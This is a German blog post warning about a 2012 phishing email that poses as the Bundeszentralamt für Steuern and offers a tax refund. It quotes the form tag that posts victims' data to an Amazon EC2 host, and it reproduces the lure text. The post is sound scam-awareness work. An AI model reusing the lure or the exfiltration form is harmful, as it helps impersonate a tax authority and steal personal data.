Phishing durch Bundeszentralamt für Steuern 26/04/2012

kleine Warnung:
Ich habe gestern eine Mail von
“Bundeszentralamt für Steuern 26/04/2012″ bekommen mit der Bitte meine Daten zu übermitteln, normalerweise ignoriere ich das, in diesem Fall aber wäre ich fast darauf hereingefallen, da Logos, Links, Stylesheets, etc. von der Webseite des existierenden Zentralamtes stammten.

Einzig das Formularfeld hat seine Daten an einen Rechner bei Amazon Cloud geschickt.

<form method="post" action="http://ec2-79-125-118-208.eu-west-1.
compute.amazonaws.com/logs/100002.php" name="HTMLForm">

Die IP des Formularfeldes ( war bei PhishTank.com registriert!

Bundeszentralamt für Steuern 26/04/2012
Steuerrückerstattung Benachrichtigung
Sehr geehrte Steuerzahler,
Nach den letzten Berechnungen des jährlichen steuerlichen
Ihre Tätigkeit haben wir festgestellt, dass Sie Anspruch
auf eine Steuererstattung von 223,56 EUR erhalten sollen.
Bitte reichen Sie die Steuererstattung Anfrage und erlauben
uns 4-6 Tage, um es zu verarbeiten.
Um Ihre Steuererstattung zuzugreifen, folgen Sie bitte den
Schritten unten:

.....- Download der Steuererstattungsansprüche Formular
im Anhang zu .......dieser E-Mail
.....- öffnen Sie sie in einem Browser
.....- folgen Sie den Anweisungen auf Ihrem Bildschirm

Bundeszentralamt für Steuern
© Bundeszentralamt für Steuern - 2010

This entry was posted in IT/Software/etc. and tagged , , . Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *

*

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>